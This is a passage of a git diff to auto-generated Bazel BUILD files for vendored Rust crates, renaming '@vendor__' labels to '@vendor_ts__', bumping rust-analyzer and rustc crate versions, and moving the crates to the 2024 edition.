@@ -81,9 +81,9 @@ rust_proc_macro( }), version = "0.2.9", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__proc-macro2-diagnostics-0.10.1//:proc_macro2_diagnostics", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__proc-macro2-diagnostics-0.10.1//:proc_macro2_diagnostics", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-0.4.7.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-0.4.7.bazel index 1f6476ee6320..5784824a2985 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-0.4.7.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-0.4.7.bazel @@ -81,7 +81,7 @@ rust_library( }), version = "0.4.7", deps = [ - "@vendor__libc-0.2.169//:libc", - "@vendor__perf-event-open-sys-1.0.1//:perf_event_open_sys", + "@vendor_ts__libc-0.2.169//:libc", + "@vendor_ts__perf-event-open-sys-1.0.1//:perf_event_open_sys", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-open-sys-1.0.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-open-sys-1.0.1.bazel index bae5d7a89bfd..92b15bc5d885 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-open-sys-1.0.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-open-sys-1.0.1.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "1.0.1", deps = [ - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__libc-0.2.169//:libc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.petgraph-0.6.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.petgraph-0.6.5.bazel index 44b02c9f9d4e..df987bd453e9 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.petgraph-0.6.5.bazel 
+++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.petgraph-0.6.5.bazel @@ -87,7 +87,7 @@ rust_library( }), version = "0.6.5", deps = [ - "@vendor__fixedbitset-0.4.2//:fixedbitset", - "@vendor__indexmap-2.7.0//:indexmap", + "@vendor_ts__fixedbitset-0.4.2//:fixedbitset", + "@vendor_ts__indexmap-2.7.0//:indexmap", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ppv-lite86-0.2.20.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ppv-lite86-0.2.20.bazel index 7a21bfe9b505..37a6586979ac 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ppv-lite86-0.2.20.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ppv-lite86-0.2.20.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "0.2.20", deps = [ - "@vendor__zerocopy-0.7.35//:zerocopy", + "@vendor_ts__zerocopy-0.7.35//:zerocopy", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-1.0.93.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-1.0.93.bazel index 17e69670194b..bcc9b7fe36af 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-1.0.93.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-1.0.93.bazel @@ -86,8 +86,8 @@ rust_library( }), version = "1.0.93", deps = [ - "@vendor__proc-macro2-1.0.93//:build_script_build", - "@vendor__unicode-ident-1.0.14//:unicode_ident", + "@vendor_ts__proc-macro2-1.0.93//:build_script_build", + "@vendor_ts__unicode-ident-1.0.16//:unicode_ident", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-diagnostics-0.10.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-diagnostics-0.10.1.bazel index 478e5671ace3..6e74bb3b8793 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-diagnostics-0.10.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-diagnostics-0.10.1.bazel 
@@ -87,11 +87,11 @@ rust_library( }), version = "0.10.1", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__proc-macro2-diagnostics-0.10.1//:build_script_build", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", - "@vendor__yansi-1.0.1//:yansi", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__proc-macro2-diagnostics-0.10.1//:build_script_build", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", + "@vendor_ts__yansi-1.0.1//:yansi", ], ) @@ -148,7 +148,7 @@ cargo_build_script( version = "0.10.1", visibility = ["//visibility:private"], deps = [ - "@vendor__version_check-0.9.5//:version_check", + "@vendor_ts__version_check-0.9.5//:version_check", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.quote-1.0.38.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.quote-1.0.38.bazel index 6e2d08c844e6..1f85e8a04310 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.quote-1.0.38.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.quote-1.0.38.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "1.0.38", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_abi-0.87.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_abi-0.97.0.bazel similarity index 88% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_abi-0.87.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_abi-0.97.0.bazel index 4eb18732fe05..742b9bee04b6 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_abi-0.87.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_abi-0.97.0.bazel 
@@ -17,7 +17,8 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra-ap-rustc_index-0.87.0//:ra_ap_rustc_index": "rustc_index", + "@vendor_ts__ra-ap-rustc_hashes-0.97.0//:ra_ap_rustc_hashes": "rustc_hashes", + "@vendor_ts__ra-ap-rustc_index-0.97.0//:ra_ap_rustc_index": "rustc_index", }, compile_data = glob( include = ["**"], @@ -32,7 +33,7 @@ rust_library( ], ), crate_root = "src/lib.rs", - edition = "2021", + edition = "2024", rustc_flags = [ "--cap-lints=allow", ], @@ -82,10 +83,11 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.87.0", + version = "0.97.0", deps = [ - "@vendor__bitflags-2.7.0//:bitflags", - "@vendor__ra-ap-rustc_index-0.87.0//:ra_ap_rustc_index", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__bitflags-2.8.0//:bitflags", + "@vendor_ts__ra-ap-rustc_hashes-0.97.0//:ra_ap_rustc_hashes", + "@vendor_ts__ra-ap-rustc_index-0.97.0//:ra_ap_rustc_index", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_hashes-0.97.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_hashes-0.97.0.bazel new file mode 100644 index 000000000000..f44bed7781db --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_hashes-0.97.0.bazel 
@@ -0,0 +1,86 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "ra_ap_rustc_hashes", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_root = "src/lib.rs", + edition = "2024", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=ra-ap-rustc_hashes", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + 
"@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.97.0", + deps = [ + "@vendor_ts__rustc-stable-hash-0.1.1//:rustc_stable_hash", + ], +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index-0.87.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index-0.97.0.bazel similarity index 92% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index-0.87.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index-0.97.0.bazel index db976fae9026..20f80a3542a4 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index-0.87.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index-0.97.0.bazel 
@@ -17,7 +17,7 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra-ap-rustc_index_macros-0.87.0//:ra_ap_rustc_index_macros": "rustc_index_macros", + "@vendor_ts__ra-ap-rustc_index_macros-0.97.0//:ra_ap_rustc_index_macros": "rustc_index_macros", }, compile_data = glob( include = ["**"], @@ -32,9 +32,9 @@ rust_library( ], ), crate_root = "src/lib.rs", - edition = "2021", + edition = "2024", proc_macro_deps = [ - "@vendor__ra-ap-rustc_index_macros-0.87.0//:ra_ap_rustc_index_macros", + "@vendor_ts__ra-ap-rustc_index_macros-0.97.0//:ra_ap_rustc_index_macros", ], rustc_flags = [ "--cap-lints=allow", @@ -85,8 +85,8 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.87.0", + version = "0.97.0", deps = [ - "@vendor__smallvec-1.13.2//:smallvec", + "@vendor_ts__smallvec-1.14.0//:smallvec", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index_macros-0.87.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index_macros-0.97.0.bazel similarity index 95% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index_macros-0.87.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index_macros-0.97.0.bazel index ec5390efd1d0..eca0772470cf 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index_macros-0.87.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index_macros-0.97.0.bazel @@ -29,7 +29,7 @@ rust_proc_macro( ], ), crate_root = "src/lib.rs", - edition = "2021", + edition = "2024", rustc_flags = [ "--cap-lints=allow", ], 
@@ -79,10 +79,10 @@ rust_proc_macro( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.87.0", + version = "0.97.0", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_lexer-0.87.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_lexer-0.97.0.bazel similarity index 94% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_lexer-0.87.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_lexer-0.97.0.bazel index e6f63b6889ee..58c662ab8d39 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_lexer-0.87.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_lexer-0.97.0.bazel @@ -29,7 +29,7 @@ rust_library( ], ), crate_root = "src/lib.rs", - edition = "2021", + edition = "2024", rustc_flags = [ "--cap-lints=allow", ], @@ -79,9 +79,10 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.87.0", + version = "0.97.0", deps = [ - "@vendor__unicode-properties-0.1.3//:unicode_properties", - "@vendor__unicode-xid-0.2.6//:unicode_xid", + "@vendor_ts__memchr-2.7.4//:memchr", + "@vendor_ts__unicode-properties-0.1.3//:unicode_properties", + "@vendor_ts__unicode-xid-0.2.6//:unicode_xid", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_parse_format-0.87.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_parse_format-0.97.0.bazel similarity index 91% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_parse_format-0.87.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_parse_format-0.97.0.bazel index eff127696b17..38ac1f7eab54 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_parse_format-0.87.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_parse_format-0.97.0.bazel @@ -17,8 +17,8 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra-ap-rustc_index-0.87.0//:ra_ap_rustc_index": "rustc_index", - "@vendor__ra-ap-rustc_lexer-0.87.0//:ra_ap_rustc_lexer": "rustc_lexer", + "@vendor_ts__ra-ap-rustc_index-0.97.0//:ra_ap_rustc_index": "rustc_index", + "@vendor_ts__ra-ap-rustc_lexer-0.97.0//:ra_ap_rustc_lexer": "rustc_lexer", }, compile_data = glob( include = ["**"], @@ -33,7 +33,7 @@ rust_library( ], ), crate_root = "src/lib.rs", - edition = "2021", + edition = "2024", rustc_flags = [ "--cap-lints=allow", ], @@ -83,9 +83,9 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.87.0", + version = "0.97.0", deps = [ - "@vendor__ra-ap-rustc_index-0.87.0//:ra_ap_rustc_index", - "@vendor__ra-ap-rustc_lexer-0.87.0//:ra_ap_rustc_lexer", + "@vendor_ts__ra-ap-rustc_index-0.97.0//:ra_ap_rustc_index", + "@vendor_ts__ra-ap-rustc_lexer-0.97.0//:ra_ap_rustc_lexer", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_pattern_analysis-0.87.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_pattern_analysis-0.97.0.bazel similarity index 89% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_pattern_analysis-0.87.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_pattern_analysis-0.97.0.bazel index 5d27526cf686..cdef8ca0b9a3 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_pattern_analysis-0.87.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_pattern_analysis-0.97.0.bazel @@ -17,7 +17,7 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra-ap-rustc_index-0.87.0//:ra_ap_rustc_index": "rustc_index", + "@vendor_ts__ra-ap-rustc_index-0.97.0//:ra_ap_rustc_index": "rustc_index", }, compile_data = glob( include = ["**"], @@ -32,7 +32,7 @@ rust_library( ], ), crate_root = "src/lib.rs", - edition = "2021", + edition = "2024", rustc_flags = [ "--cap-lints=allow", ], @@ -82,12 +82,12 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.87.0", + version = "0.97.0", deps = [ - "@vendor__ra-ap-rustc_index-0.87.0//:ra_ap_rustc_index", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:rustc_apfloat", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__ra-ap-rustc_index-0.97.0//:ra_ap_rustc_index", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:rustc_apfloat", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_base_db-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_base_db-0.0.266.bazel similarity index 76% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_base_db-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_base_db-0.0.266.bazel index 592b32e7a456..70595c88a116 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_base_db-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_base_db-0.0.266.bazel @@ -17,12 +17,12 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg": "cfg", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs": "vfs", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg": "cfg", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs": "vfs", }, compile_data = glob( include = ["**"], 
@@ -87,20 +87,20 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__la-arena-0.3.1//:la_arena", - "@vendor__lz4_flex-0.11.3//:lz4_flex", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_salsa-0.0.258//:ra_salsa", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__semver-1.0.24//:semver", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__la-arena-0.3.1//:la_arena", + "@vendor_ts__lz4_flex-0.11.3//:lz4_flex", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_salsa-0.0.266//:ra_salsa", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__semver-1.0.24//:semver", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_cfg-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_cfg-0.0.266.bazel similarity index 90% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_cfg-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_cfg-0.0.266.bazel index 779a777c067a..e58f52a7129d 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_cfg-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_cfg-0.0.266.bazel 
@@ -17,8 +17,8 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", }, compile_data = glob( include = ["**"], @@ -86,11 +86,11 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_edition-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_edition-0.0.266.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_edition-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_edition-0.0.266.bazel index eed58b91a1f2..2c7410fd47f7 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_edition-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_edition-0.0.266.bazel @@ -79,5 +79,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir-0.0.266.bazel similarity index 68% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir-0.0.266.bazel index 54a350d42d68..5a688858e7fb 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir-0.0.266.bazel @@ -17,16 +17,16 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db": "base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg": "cfg", - "@vendor__ra_ap_hir_def-0.0.258//:ra_ap_hir_def": "hir_def", - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand": "hir_expand", - "@vendor__ra_ap_hir_ty-0.0.258//:ra_ap_hir_ty": "hir_ty", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db": "base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg": "cfg", + "@vendor_ts__ra_ap_hir_def-0.0.266//:ra_ap_hir_def": "hir_def", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand": "hir_expand", + "@vendor_ts__ra_ap_hir_ty-0.0.266//:ra_ap_hir_ty": "hir_ty", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", }, compile_data = glob( include = ["**"], 
